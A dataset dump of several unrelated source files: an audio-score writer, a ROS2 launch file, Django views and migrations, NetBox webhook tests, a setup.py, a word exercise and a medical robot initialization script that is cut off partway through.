segment pitch and dB that must be passed for a sample to be considered for selection'''\n\t\tself.instrument_tests = {}\n\t\t# loop through all instruments\n\t\tfor i in self.instruments:\t\n\t\t\t# loop through each voice available to each instrument\n\t\t\tfor v in self.instruments[i]['cps']:\n\t\t\t\t# set up the test dict\n\t\t\t\tself.instrument_tests[i, v] = {'pitch': [], 'pitch2': [], 'db2': []}\n\t\t\t\tminmaxdict = self.tracker.get_chord_minmax(i, tidx, v)\n\t\t\t\tif minmaxdict == None: \n\t\t\t\t\t# no other notes found here\n\t\t\t\t\tcontinue\n\t\t\t\t# max range\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_max_range'] != None:\n\t\t\t\t\textra_room_in_range = self.instruments[i]['cps'][v]['polyphony_max_range']-minmaxdict['pitchrange']\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f >= %f and %%f <= %f'%(minmaxdict['pitchmin']-extra_room_in_range, minmaxdict['pitchmax']+extra_room_in_range))\n\t\t\t\t# min range\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_min_range'] != None:\n\t\t\t\t\textra_room_in_minrange = self.instruments[i]['cps'][v]['polyphony_min_range']-minmaxdict['pitchrange']\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f <= %f or %%f >= %f'%(minmaxdict['pitchmin']-extra_room_in_minrange, minmaxdict['pitchmax']+extra_room_in_minrange))\n\t\t\t\t# unison tests\n\t\t\t\tif not self.instruments[i]['cps'][v]['polyphony_permit_unison']:\n\t\t\t\t\tfor p in minmaxdict['pitches']:\n\t\t\t\t\t\tself.instrument_tests[i, v]['pitch'].append('%%f != %f'%(p))\n\t\t\t\t# max db\n\t\t\t\tif self.instruments[i]['cps'][v]['polyphony_max_db_difference'] != None:\n\t\t\t\t\textra_room_in_minrange = self.instruments[i]['cps'][v]['polyphony_max_db_difference']-minmaxdict['dbrange']\n\t\t\t\t\tself.instrument_tests[i, v]['db2'].append('%%f >= %f and %%f <= %f'%(minmaxdict['dbmin']-extra_room_in_minrange, minmaxdict['dbmax']+extra_room_in_minrange))\n\t\t\t# interval restriction in time\n\t\t\tfor minp, maxp in self.tracker.get_interval_restrictions(self.instruments, i, v, tidx):\n\t\t\t\tfor v in self.instruments[i]['cps']:\n\t\t\t\t\tself.instrument_tests[i, v]['pitch2'].append('%%f >= %f and %%f <= %f'%(minp, maxp))\n\t########################################\n\tdef test_corpus_segment(self, tidx, cobj):\n\t\t'''this test happens on the corpus at a segment-by-segment basis'''\n\t\tif not self.active: return True\n\t\tif len(self.valid_instruments_per_voice[cobj.voiceID]) == 0: return False\n\t\tcobj.instrument_candidates = []\n\n\t\tPITCH = cobj.desc['MIDIPitch-seg'].get(None, None)\n\t\tif cobj.transMethod != None and cobj.transMethod.startswith(\"semitone\"):\n\t\t\t# exception for midipitch to incorporate transposition\n\t\t\tPITCH += float(cobj.transMethod.split()[1])\n\t\tDB = util.ampToDb(cobj.desc['power-seg'].get(None, None)) + cobj.envDb\n\t\t\n\t\tfor i in self.valid_instruments_per_voice[cobj.voiceID]:\n\t\t\tadd_this_instr = True\n\t\t\t################################################\n\t\t\t## test for descriptor-based polophony limits ##\n\t\t\t################################################\n\t\t\ttests = []\n\t\t\t# single pitch conditionals\n\t\t\ttests.extend([teststring%(PITCH) for teststring in self.instrument_tests[i, cobj.voiceID]['pitch']])\n\t\t\t# double pitch conditionals\n\t\t\ttests.extend([teststring%(PITCH, PITCH) for teststring in self.instrument_tests[i, cobj.voiceID]['pitch2']])\n\t\t\t# double dB conditionals\t\t\t\n\t\t\ttests.extend([teststring%(DB, DB) for teststring in self.instrument_tests[i, cobj.voiceID]['db2']])\n\t\t\tfor t in tests:\n\t\t\t\tif not eval(t):\n\t\t\t\t\tadd_this_instr = False\n\t\t\t\t\tbreak\n\n\t\t\tif add_this_instr: cobj.instrument_candidates.append(i)\n\t\tif len(cobj.instrument_candidates) == 0: return False\n\t\telse: return True\n\t########################################\n\tdef increment(self, start, dur, eobj):\n\t\tif not self.active: return\n\t\tif eobj.sfseghandle.instrTag not in self.instrument_names:\n\t\t\teobj.selectedinstrument = None\n\t\t\tself.tracker.noninstrument_num_notes += 1\n\t\t\treturn\n\t\t# if we're passing this point, we're picking the instrument\n\t\tvc = eobj.sfseghandle.voiceID\n\t\teobj.selectedinstrument = eobj.sfseghandle.instrument_candidates[0]\n\t\teobj.selectedInstrumentIdx = self.instrumentNameToIdx[eobj.selectedinstrument]\n\t\tthisinstr = self.instruments[eobj.selectedinstrument]\n\t\t# increment shit\n\t\tif thisinstr['cps'][vc]['temporal_mode'] == 'artic': dur = 1\n\t\tself.tracker.addnote(eobj.selectedinstrument, eobj.sfseghandle.voiceID, start, dur, thisinstr['cps'][eobj.sfseghandle.voiceID]['cobj_to_pitch'][eobj.sfseghandle], eobj.rmsSeg+eobj.envDb, thisinstr['cps'][vc]['technique'])\n\t########################################\n\tdef write(self, outputEvents):\n\t\tif not self.active: return\n\n\t\tdictByInstrument = {}\n\t\tfor eobj in outputEvents:\n\t\t\tif eobj.selectedinstrument == None: continue\n\t\t\tif eobj.selectedinstrument not in dictByInstrument: dictByInstrument[eobj.selectedinstrument] = {}\n\t\t\tthiscps = self.instruments[eobj.selectedinstrument]['cps'][eobj.voiceID]\n\t\t\ttimeinMs = int(eobj.timeInScore*1000)\n\t\t\tdurationInMs = int(eobj.tgtsegdur*1000) # cps duration may be modified by clipDurationToTarget; duration is the sf duration.\n\t\t\tpitchInCents = thiscps['cobj_to_pitch'][eobj.sfseghandle]*100\n\t\t\tdb = eobj.envDb\n\t\t\tif db < -60: db = -60\n\t\t\tamp127 = int((util.dbToAmp(db)-util.dbToAmp(-60))/(1-util.dbToAmp(-60)) * 127)\n\n\t\t\t# do slots stuff\n\t\t\tslotAssignEveryNote = [(1, 'technique', str(thiscps['technique']), 'text'), (2, 'temporal_mode', thiscps['temporal_mode'], 'text'), (3, 'selectnumber', int(eobj.simSelects), 'int'), (10, 'fullpath', eobj.filename, 'text'), (11, 'filename', eobj.printName, 'text'), (12, 'sfskiptime', eobj.sfSkip*1000, 'float'), (13, 'db_scale', eobj.envDb, 'float'), (14, 'sftransposition', eobj.transposition, 'float'), (15, 'sfchannels', int(eobj.sfchnls), 'int')]\n\t\t\tslotDataOnlyOnce = {}\n\t\t\tif eobj.dynamicFromFilename != None:\n\t\t\t\tslotDataOnlyOnce[20] = eobj.dynamicFromFilename\n\t\t\telse:\n\t\t\t\tslotDataOnlyOnce[20] = self.instruments[eobj.selectedinstrument]['cps'][eobj.voiceID]['cobj_to_dyn'][eobj.sfseghandle]\n\t\t\tif thiscps['articulation'] != None:\n\t\t\t\tslotDataOnlyOnce[22] = \"%s\"%thiscps['articulation']\n\t\t\tif thiscps['notehead'] != None:\n\t\t\t\tslotDataOnlyOnce[23] = \"%s\"%thiscps['notehead']\n\t\t\tif thiscps['annotation'] != None:\n\t\t\t\tslotDataOnlyOnce[24] = \"%s\"%thiscps['annotation']\n\n\n\n\t\t\tif timeinMs not in self.instruments[eobj.selectedinstrument]['notes']:\n\t\t\t\tself.instruments[eobj.selectedinstrument]['notes'][timeinMs] = [[], slotDataOnlyOnce]\n\t\t\tself.instruments[eobj.selectedinstrument]['notes'][timeinMs][0].append([pitchInCents, durationInMs, amp127, slotAssignEveryNote])\n\t\t\n\t\tbachstring = 'roll '\n\t\t# set up clefs\n\t\tclefs = ['clefs'] + [self.instruments[i]['params'].params['clef'] for i in self.instruments]\n\t\tbachstring += \"[%s] \"%' '.join(clefs)\n\t\t# set up voices\n\t\tvoicenames = ['voicenames'] + [self.instruments[i]['displayname'] for i in self.instruments]\n\t\tbachstring += \"[%s] \"%' '.join(voicenames)\n\t\t# slots\n\t\tcustomslots = ['[%i [type %s] [name %s]]'%(slotnumb, slottype, slotname) for slotnumb, slotname, slotdata, slottype in slotAssignEveryNote]\n\t\tbachstring += '[slotinfo %s]'%' '.join(customslots)\n\t\t# [2 [type text] [name french]] [3 [type text] [name italian]]\n\t\t# \n\t\tfor instru in self.instruments:\n\t\t\tbachstring += '[ ' # instrument start\n\t\t\tfor time, (notelist, slotDict) in self.instruments[instru]['notes'].items():\n\t\t\t\tbachstring += '[%i.'%time # note start\n\t\t\t\tfor didx, d in enumerate(notelist):\n\t\t\t\t\t# only write slots for first note\n\t\t\t\t\talways = ' '.join(['[%i %s]'%(slotnumb, slotdata) for slotnumb, slotname, slotdata, slottype in d[3]])\n\t\t\t\t\tif didx == 0:\n\t\t\t\t\t\tonce = ' '.join(['[%i %s]'%(slotnumb, slotDataOnlyOnce) for slotnumb, slotDataOnlyOnce in slotDict.items()])\n\t\t\t\t\t\tslotstring = '[slots %s %s ]'%(once, always)\n\t\t\t\t\telse: #already wrote slots on a prev not in this chord\n\t\t\t\t\t\tslotstring = '[slots %s ]'%(always)\n\t\t\t\t\tbachstring += ' [%i %i %i %s] '%(d[0], d[1], d[2], slotstring)\n\t\t\t\tbachstring += '] ' # note end\n\t\t\tbachstring += '] ' # instrument end\n\t\t\t\n\t\tfh = open(self.outputfile, 'w')\n\t\tfh.write(bachstring)\n\t\tfh.close()\n\t########################################\n\n\n\n\n","sub_path":"audioguide/musicalwriting.py","file_name":"musicalwriting.py","file_ext":"py","file_size_in_byte":23816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"43033069","text":"from launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch.conditions import IfCondition\nfrom launch.substitutions import Command, FindExecutable, LaunchConfiguration, PathJoinSubstitution\nfrom launch.actions import IncludeLaunchDescription, ExecuteProcess\nfrom launch_ros.actions import Node\nfrom launch_ros.substitutions import FindPackageShare\n\n\ndef generate_launch_description():\n\n urdf_file='/home/luqman/ros2_workspace/src/bazu_6dof/urdf/bazu_gazebo_controller_position.urdf'\n return LaunchDescription([\n # publishes TF for links of the robot without joints\n Node(\n package='robot_state_publisher',\n executable='robot_state_publisher',\n name='robot_state_publisher',\n output='screen',\n arguments=[urdf_file]),\n # To publish tf for Joints only links\n Node(\n package='joint_state_publisher',\n executable='joint_state_publisher',\n name='joint_state_publisher',\n output='screen',\n ),\n# Gazebo related stuff required to launch the robot in simulation\n ExecuteProcess(\n cmd=['gazebo', '--verbose', '-s', 'libgazebo_ros_factory.so'],\n output='screen'),\n Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n name='urdf_spawner',\n output='screen',\n arguments=[\"-topic\", \"/robot_description\", \"-entity\", \"bazu\"]),\n \n# Running the controllers in launch file\n ExecuteProcess(\n cmd=['ros2', 'control', 'load_controller', '--set-state', 'start','joint_state_broadcaster'],\n output='screen'\n ),\n\n ExecuteProcess(\n cmd=['ros2', 'control', 'load_controller', '--set-state', 'start', 'forward_position_controller'],\n output='screen'\n )\n ])\n# after this simple simulation launcher we need to launch the controllers manually\n\n# - run the commands to load the controller as described in your controller names\n# - ***\"ros2 control load_controller forward_position_controller\"***\n# - Now configure it\n# - ***ros2 control set_controller_state forward_position_controller configure***\n# - Start the Controller\n# - ***ros2 control switch_controllers --start forward_position_controller***\n\n# \"data:\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\n# - 0.5\"\n","sub_path":"bazu_6dof/launch/3_position_controller.launch.py","file_name":"3_position_controller.launch.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"284529788","text":"from django.shortcuts import render\nfrom listings.models import Listing as lst\nfrom realtors.models import Realtor as rltr\nfrom listings.choices import bedroom_choices,price_choices,state_choices\n# Create your views here.\ndef HomePage(request):\n list = lst.objects.order_by('-list_date')[0:3]\n context = {\n 'state_choices':state_choices,\n 'bedroom_choices':bedroom_choices,\n 'price_choices':price_choices,\n 'listings' : list,\n }\n return render(request,'testapp/homepage.html',context)\n\ndef About(request):\n #get all realtors\n realtors_all = rltr.objects.order_by('-hire_date')\n #get mvp\n realtors_mvp = rltr.objects.all().filter(is_mvp = True)\n\n context = {'realtors' : realtors_all,'mvp_realtors' : realtors_mvp,}\n\n return render(request,'testapp/about.html',context)\n","sub_path":"testapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614306438","text":"\n\ndef avoids( word, avoiding ):\n\t\t\"\"\"avoids returns True if none of the letters in the list avoiding are in the word\"\"\"\n\t\tfor letter in avoiding:\n\t\t\tif letter in word:\n\t\t\t\treturn False\n\n\t\treturn True\n\ndef get_list():\n\t\tletters = []\n\t\twhile True:\n\t\t\t\tx = input(\"enter a letter to avoid or end to finish:\\n\")\n\t\t\t\tif str(x) == \"end\":\n\t\t\t\t\t\tbreak\n\t\t\t\tletters.append(x.strip())\n\t\treturn letters\n\n\n\nmy_file = open('words.txt')\n#avoid_list = ['a','e','i','o','u']\ncount = 0\navoid_list = get_list()\nprint(avoid_list)\n\nfor line in my_file:\n\tword = line.strip()\n\tif avoids(word,avoid_list) :\n\t\t\tprint(word)\n\t\t\tcount += 1\n\nprint(\"number of words = {count}\".format(count=count))\n\t\n","sub_path":"ch9_word_play/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"332925570","text":"# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\nfrom os import path, environ\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nhere = path.abspath(path.dirname(__file__))\ninstall_reqs = parse_requirements('requirements.txt')\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nif environ.get('CI_COMMIT_TAG'):\n version = environ['CI_COMMIT_TAG']\nelif environ.get('CI_JOB_ID'):\n version = environ['CI_JOB_ID']\nelse:\n version = 'dev'\n\n\nsetup(\n name='meos_sdk', # Required\n version=version, # Required\n description='Interact with the meos personal cloud environment',\n long_description=long_description, # Optional\n long_description_content_type='text/markdown', # Optional (see note above)\n classifiers=[ # Optional\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required\n python_requires='>=3.5, <4',\n install_requires=install_reqs,\n include_package_data=True,\n entry_points={\n 'console_scripts': [\n 'meos_sdk = meos_sdk.cli:meos_sdk',\n ],\n },\n)\n","sub_path":"pypi_install_script/meos_sdk-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"22328938","text":"import django_rq\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom dcim.models import Site\nfrom extras.choices import ObjectChangeActionChoices\nfrom extras.models import Webhook\nfrom utilities.testing import APITestCase\n\n\nclass WebhookTest(APITestCase):\n\n def setUp(self):\n\n super().setUp()\n\n self.queue = django_rq.get_queue('default')\n self.queue.empty() # Begin each test with an empty queue\n\n @classmethod\n def setUpTestData(cls):\n\n site_ct = ContentType.objects.get_for_model(Site)\n PAYLOAD_URL = \"http://localhost/\"\n webhooks = Webhook.objects.bulk_create((\n Webhook(name='Site Create Webhook', type_create=True, payload_url=PAYLOAD_URL),\n Webhook(name='Site Update Webhook', type_update=True, payload_url=PAYLOAD_URL),\n Webhook(name='Site Delete Webhook', type_delete=True, payload_url=PAYLOAD_URL),\n ))\n for webhook in webhooks:\n webhook.obj_type.set([site_ct])\n\n def test_enqueue_webhook_create(self):\n\n # Create an object via the REST API\n data = {\n 'name': 'Test Site',\n 'slug': 'test-site',\n }\n url = reverse('dcim-api:site-list')\n response = self.client.post(url, data, format='json', **self.header)\n self.assertHttpStatus(response, status.HTTP_201_CREATED)\n self.assertEqual(Site.objects.count(), 1)\n\n # Verify that a job was queued for the object creation webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_create=True))\n self.assertEqual(job.args[1]['id'], response.data['id'])\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_CREATE)\n\n def test_enqueue_webhook_update(self):\n\n site = Site.objects.create(name='Site 1', slug='site-1')\n\n # Update an object via the REST API\n data = {\n 'comments': 'Updated the site',\n }\n url = reverse('dcim-api:site-detail', kwargs={'pk': site.pk})\n response = self.client.patch(url, data, format='json', **self.header)\n self.assertHttpStatus(response, status.HTTP_200_OK)\n\n # Verify that a job was queued for the object update webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_update=True))\n self.assertEqual(job.args[1]['id'], site.pk)\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_UPDATE)\n\n def test_enqueue_webhook_delete(self):\n\n site = Site.objects.create(name='Site 1', slug='site-1')\n\n # Delete an object via the REST API\n url = reverse('dcim-api:site-detail', kwargs={'pk': site.pk})\n response = self.client.delete(url, **self.header)\n self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)\n\n # Verify that a job was queued for the object update webhook\n self.assertEqual(self.queue.count, 1)\n job = self.queue.jobs[0]\n self.assertEqual(job.args[0], Webhook.objects.get(type_delete=True))\n self.assertEqual(job.args[1]['id'], site.pk)\n self.assertEqual(job.args[2], 'site')\n self.assertEqual(job.args[3], ObjectChangeActionChoices.ACTION_DELETE)\n","sub_path":"netbox/extras/tests/test_webhooks.py","file_name":"test_webhooks.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462362312","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.contrib.postgres.fields\nimport localflavor.us.models\nimport django.contrib.gis.db.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gridentities', '0007_auto_20160223_0007'),\n\n # all other apps have linked to balancing authority, needed for running tests\n ('griddata', '0001_initial'),\n ('carbon', '0001_initial'),\n ('marginal', '0001_initial'),\n ('datafile', '0001_initial'),\n ('hooks', '0001_initial'),\n ('spatial_predictors', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameModel('BalancingAuthority', 'GridLocation'),\n migrations.AlterField(\n model_name='gridareacollection',\n name='areas',\n field=models.ManyToManyField(to='gridentities.GridLocation'),\n ),\n ]\n","sub_path":"watttime_grid_api/apps/gridentities/migrations/0008_auto_20160223_0134.py","file_name":"0008_auto_20160223_0134.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"238751119","text":"'''\ninitialize_robot.py runs all the communication commands that were originially in IDM.py\nPerforms the initial contact, homing and tensioning.\n'''\nimport sys, time\nfrom robot.devices.xbox_controller.xbox_wrapper import xbox\n\n\n# The maximum velocity at which the IDMApp will allow us to go (mm / sec).\nmaxVelMMS = 150.0\n# Length, in milliseconds, of a single cycle of the IDM App. \n# remove some time for system delay\ncycleTimeS = 4.0 / 1000.0\n\n# Possible states of the IDM\nIDMStates = { \"Init\" : 0,\n \"Initialized\" : 1,\n \"Powering\" : 2,\n \"Powered\": 3,\n \"Homing\" : 4,\n \"Ready\" : 5,\n \"Follow\" : 6,\n \"Tensioning\" : 7,\n \"Fault\" : 8}\n# Possible Commands to send to the IDMApp.\nIDMCmd = { \"POWERON\" : 0,\n \"POWEROFF\" : 1,\n \"START_HOME\" : 2,\n \"STOP_HOME\" : 3,\n \"START_FOLLOW\" : 6,\n \"STOP_FOLLOW\" : 7,\n \"TENSION_SHEATH\" : 8,\n \"TENSION_LEADER\" : 9,\n \"TENSION_BOTH\" : 10,\n \"TENSION_STOP\" : 11}\n\n\n# key function:\ndef initialize_system(domainId = 5, # not sure what 5 is doing\n sheath = \"BAS08\", \n leader = \"BAL08\", \n tension = False):\n\n # handle to auris communication\n from robot.private.AurisLowLevel import PyAurisInterface\n g_PyAuris = PyAurisInterface() \n # Setup Network\n err = g_PyAuris.Initialize(domainId, None)\n if (err != 0):\n print(\"Failed to connect RTI (\", err, \")\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n g_PyAuris.EstablishIDMConnection()\n if (err != 0):\n print(\"Failed to connect to IDM (\", err, \")\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n\n # home the system and place it in the ready state\n err = GoToReadyState(g_PyAuris)\n if (err != 0):\n print(\"Failed to enter Ready State.\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n\n tension_sheath = False\n tension_leader = False\n if tension:\n input(\"Load Catheter Now. Press enter to load and tension ...\\n\")\n tension_input = input(\"Load Catheter Now. Do you want to tension the sheath? (y/n)...\\n\")\n tension_sheath = True if tension_input.lower() == 'y' else False\n leader_input = input(\"Do you want to tension the leader too? (y/n)...\\n\")\n tension_leader = True if leader_input.lower() == 'y' else False\n\n err = LoadCathetersAndFollow(g_PyAuris, sheath = sheath, leader = leader, tension_sheath = tension_sheath, tension_leader = tension_leader)\n if (err != 0):\n print(\"Failed to Load Catheters.\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n\n xbox_handle = InitializeGamePad(g_PyAuris)\n\n return g_PyAuris, xbox_handle\n \n\n#### IDM States functions #####\ndef StateFromInt(idmState):\n \"\"\" Returns a string IDM state given the integer number of the state.\n Returns an empty string if no such state is found. \"\"\"\n keys = [i for key, value in IDMStates.items() if value == idmState]\n if len(keys) != 1:\n return \"\"\n else:\n return keys[0]\n\ndef IntFromState(idmState):\n \"\"\" Returns an integer IDM state given the string name of the state.\n Throws KeyError. \"\"\"\n return IDMStates[idmState]\n\ndef CmdFromInt(idmCmd):\n \"\"\" Returns a string IDM state given the integer number of the state.\n Returns an empty string if no such state is found. \"\"\"\n keys = [value for key, value in IDMCmd.items() if value == idmCmd]\n if len(keys) != 1:\n return \"\"\n else:\n return keys[0]\n\ndef IntFromCmd(idmCmd):\n \"\"\" Returns an integer IDM state given the string name of the state.\n Throws KeyError. \"\"\"\n return IDMCmd[idmCmd]\n\n\n################# Basic IDM Commands to Initialize ######################################\n\ndef LoadLeader(g_PyAuris, instrument):\n \"\"\" Loads a leader instrument. \"\"\"\n return g_PyAuris.LoadLeader(instrument)\n\ndef LoadSheath(g_PyAuris, instrument):\n \"\"\" Loads a sheath instrument. \"\"\"\n return g_PyAuris.LoadSheath(instrument)\n\ndef EnablePower(g_PyAuris):\n \"\"\" Sends enable power command to the IDM. \"\"\"\n return g_PyAuris.SendIDMCommand(IntFromCmd(\"POWERON\"))\n\ndef DisablePower(g_PyAuris):\n \"\"\" Sends disable power command to the IDM. \"\"\"\n return g_PyAuris.SendIDMCommand(IntFromCmd(\"POWEROFF\"))\n\ndef StartHoming(g_PyAuris):\n \"\"\" Sends start homing the IDM. \"\"\"\n return g_PyAuris.SendIDMCommand(IntFromCmd(\"START_HOME\"))\n\ndef StartFollow(g_PyAuris, timeout=2000):\n \"\"\" Figures out how to get IDM to start following (ie, be able to accept\n commands).\n Args:\n timeout: milliseconds of timeout. \"\"\"\n end_time = time.time() + timeout / 1000.0\n while time.time() < end_time:\n status = GetStatus()\n print(repr(status))\n if status == IDMStates[\"Follow\"]:\n return 0\n elif status == IDMStates[\"Fault\"]:\n print(\"IDM in Fault state.\")\n return -1\n elif status == IDMStates[\"Ready\"]:\n g_PyAuris.SendIDMCommand(IDMCmd[\"START_FOLLOW\"])\n # Wait a moment to let the follow command take effect.\n time.sleep(0.6)\n return 0\n elif status == IDMStates[\"Init\"] or status == IDMStates[\"Initialized\"]:\n # Sometimes there are issues when we just started a connection and\n # still need some time to get the data.\n time.sleep(0.6)\n if status == IDMStates[\"Init\"] or status == IDMStates[\"Initialized\"]:\n g_PyAuris.SendIDMCommand(IDMCmd[\"POWERON\"])\n elif status == IDMStates[\"Powered\"]:\n g_PyAuris.SendIDMCommand(IDMCmd[\"START_HOME\"])\n time.sleep(0.1)\n\ndef InitializeGamePad(g_PyAuris):\n \"\"\" Turn the game pad on. Must init system first. \"\"\"\n xbox_handle = xbox(g_PyAuris)\n return xbox_handle\n\ndef InitializeSystemMinimally(g_PyAuris, domainId):\n # Setup Network\n err = g_PyAuris.Initialize(domainId, None)\n if (err != 0):\n print(\"Failed to connect RTI (\", err, \")\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n g_PyAuris.EstablishIDMConnection()\n if (err != 0):\n print(\"Failed to connect to IDM (\", err, \")\")\n input(\"Press Enter to exit ...\")\n sys.exit(-1)\n\n\n\ndef GetStatus(g_PyAuris):\n \"\"\" Returns the current IDM status (int). \"\"\"\n return g_PyAuris.GetIDMStatus()\n\ndef GoToReadyState(g_PyAuris):\n \"\"\" Moves IDM into Ready State so we can next load a catheter. \"\"\"\n print(\"Putting IDM in Ready State\")\n state = \"START\"\n done = False\n printOnce = True\n while (not done):\n sys.stdout.flush()\n time.sleep(0.01)\n status = GetStatus(g_PyAuris)\n if (state == \"START\"):\n # figure out where we are at start\n if (status == IDMStates[\"Ready\"]):\n state = \"READY\"\n continue\n elif (status == IDMStates[\"Init\"]):\n if (printOnce):\n print(\"Waiting for system to Initialize.\")\n printOnce = False\n continue\n elif (status == IDMStates[\"Initialized\"]):\n print(\"System Initialized. Enabling Power.\")\n g_PyAuris.SendIDMCommand(IntFromCmd(\"POWERON\"))\n state = \"DO_POWER\"\n continue\n elif (status == IDMStates[\"Powering\"] \\\n or status == IDMStates[\"Powered\"]):\n print(\"Waiting for System to Power.\")\n state = \"DO_POWER\"\n continue\n elif (status == IDMStates[\"Homing\"]):\n print(\"Waiting for System to Home.\")\n state = \"DO_HOME\"\n continue\n elif (status == IDMStates[\"Follow\"]):\n print(\"Stopping Follow Master.\")\n g_PyAuris.SendIDMCommand(IntFromCmd(\"STOP_FOLLOW\"))\n state = \"DO_STOP\"\n continue\n elif (status == IDMStates[\"Fault\"]):\n print(\"System is in Fault. Please restart the IDMApp\",\n \"before running this script\")\n return -1\n else:\n print(\"Not sure what to do in state (\", StateFromInt(status), \")\")\n return -1\n elif (state == \"DO_POWER\"):\n if (status == IDMStates[\"Powered\"]):\n print(\"System Powered. Doing Homing.\\n\")\n input(\"Press enter to home. Make sure the catheter module is disconnected.\\n\")\n # print(g_PyAuris.GetMotorCurrents())\n g_PyAuris.SendIDMCommand(IntFromCmd(\"START_HOME\"))\n state = \"DO_HOME\"\n continue\n elif (state == \"DO_HOME\"):\n if (status == IDMStates[\"Ready\"]):\n # print(\"System Homed.\\n\")\n state = \"READY\"\n continue\n elif (state == \"DO_STOP\"):\n if (status == IDMStates[\"Ready\"]):\n print(\"System Stopped.\\n\")\n state = \"READY\"\n continue\n elif (state == \"READY\"):\n if (status == IDMStates[\"Ready\"]):\n print(\"System Ready.\\n\")\n return 0\n else:\n print(\"Unknown State (\", state,\n \"): status (\"+ StateFromInt(status), \")\")\n\ndef LoadCathetersAndFollow(g_PyAuris, sheath = 'BS38', leader = 'BL36', tension_sheath = False, tension_leader = False):\n \"\"\" Load the catheter tension and start follow. \"\"\"\n print(\"Loading Catheters.\")\n state = \"START\"\n done = False\n printOnce = True\n while (not done):\n sys.stdout.flush()\n time.sleep(0.01)\n status = GetStatus(g_PyAuris)\n if (state == \"START\"):\n if (status != IDMStates[\"Ready\"]):\n print(\"System must be in Ready State.\")\n return -1\n else:\n state = \"LOAD_LEADER\"\n continue\n elif (state == \"LOAD_LEADER\"):\n if leader:\n print(\"Loading Leader.\")\n err = LoadLeader(g_PyAuris, leader)\n if (err != 0):\n print(\"Failed to Load Leader (%s).\" % (str(err)));\n return -1\n state = \"LOAD_SHEATH\"\n continue\n elif (state == \"LOAD_SHEATH\"):\n if sheath:\n print(\"Loading Sheath.\")\n err = LoadSheath(g_PyAuris, sheath)\n if (err != 0):\n print(\"Failed to Load Sheath (%s).\" % (str(err)));\n return -1\n state = \"DO_TENSION\"\n continue\n elif (state == \"DO_TENSION\"):\n if tension_leader or tension_sheath:\n print(\"Catheters Selected. Tensioning.\")\n else:\n state = \"WAIT_FOLLOW\"\n continue\n # inserted the tension_leader flag to skip over this step if only using the sheath\n if tension_leader:\n print(\"Tensioning Leader ...\")\n sys.stdout.flush()\n # LEADER TENSIONING\n g_PyAuris.SendIDMCommand(IntFromCmd(\"TENSION_LEADER\"))\n while (True):\n if (g_PyAuris.GetLeaderTensionStatus() == 2):\n state = \"WAIT_FOLLOW\"\n time.sleep(0.05)\n break\n if tension_sheath:\n print(\"Tensioning Sheath ...\")\n # print(\"D'application de tension a le gaine ...\")\n sys.stdout.flush()\n g_PyAuris.SendIDMCommand(IntFromCmd(\"TENSION_SHEATH\"))\n while (True):\n # print(g_PyAuris.GetSheathTensionStatus())\n if (g_PyAuris.GetSheathTensionStatus() == 2):\n # print(\"a: \", g_PyAuris.GetSheathTensionStatus())\n state = \"WAIT_FOLLOW\"\n time.sleep(0.05)\n break\n continue\n elif (state == \"WAIT_FOLLOW\"):\n if (status == IDMStates[\"Ready\"]):\n g_PyAuris.SendIDMCommand(IntFromCmd(\"START_FOLLOW\"))\n state = \"DO_FOLLOW\"\n continue\n elif (state == \"DO_FOLLOW\"):\n if (status == IDMStates[\"Ready\"]):\n time.sleep(0.5)\n 